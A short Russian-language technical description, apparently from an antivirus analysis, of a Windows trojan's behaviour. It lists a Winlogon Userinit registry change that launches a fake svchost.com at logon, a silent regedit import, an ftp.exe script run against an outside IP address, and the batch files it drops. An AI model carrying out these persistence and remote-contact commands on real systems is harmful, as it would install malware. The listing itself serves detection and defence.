Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Userinit' = '<SYSTEM32>\userinit.exe,<SYSTEM32>\svchost.com'
- <SYSTEM32>\svchost.com
- %WINDIR%\regedit.exe /s <SYSTEM32>\vsrs.reg
- <SYSTEM32>\ftp.exe -s:<SYSTEM32>\Internet.txt 91.203.4.51
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\svchost.bat" "
- <SYSTEM32>\xcopy.exe /H /Y *.exe <SYSTEM32>\svchost.com
- <SYSTEM32>\Test.txt
- <SYSTEM32>\Internet.txt
- %TEMP%\2.tmp\svchost.bat
- %TEMP%\1.tmp\svchost.bat
- <SYSTEM32>\svchost.com
- <SYSTEM32>\vsrs.reg
- <SYSTEM32>\vsrs.reg
- '91.#03.4.51':21
- ClassName: 'RegEdit_RegEdit' WindowName: ''